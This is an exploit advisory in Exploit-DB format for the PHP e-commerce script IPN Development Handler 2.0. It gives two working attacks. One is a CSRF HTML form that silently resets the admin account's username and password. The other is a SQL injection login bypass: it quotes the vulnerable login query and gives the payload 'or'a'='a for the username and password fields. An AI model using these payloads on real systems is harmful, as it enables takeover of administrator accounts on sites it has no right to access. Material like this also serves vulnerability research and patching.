IPN Development Handler 2.0 - Multiple Vulnerabilities

EDB-ID:

15813

CVE:

N/A




Platform:

PHP

Date:

2010-12-23


IPN Development Handler v2.0 CSRF (Change Admin Account)
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################


===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="s1" value="Update"/>
</form>

</body>
</html>

####################################################################

IPN Development Handler v2.0 Auth Bypass
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/

####################################################################

===[ Vulnerability ]===
Source Code path/siteadmin/login.php

if(isset($_POST[s2]))
{
$MyUsername1 = strip_tags($_POST[username1]);
$MyPassword1 = strip_tags($_POST[password1]);

if(empty($MyUsername1) || empty($MyPassword1))
{
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";
}
else
{
//check the login info if exists
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";

$r1 = mysql_query($q1);

if(!$r1)
{
echo mysql_error();
exit();

===[ Exploit ]===

1- Go to Siteadmin [www.site.com/siteadmin/login.php]
2- join code Auth Bypass in Username & Password
3- Username: 'or'a'='a
Password: 'or'a'='a


####################################################################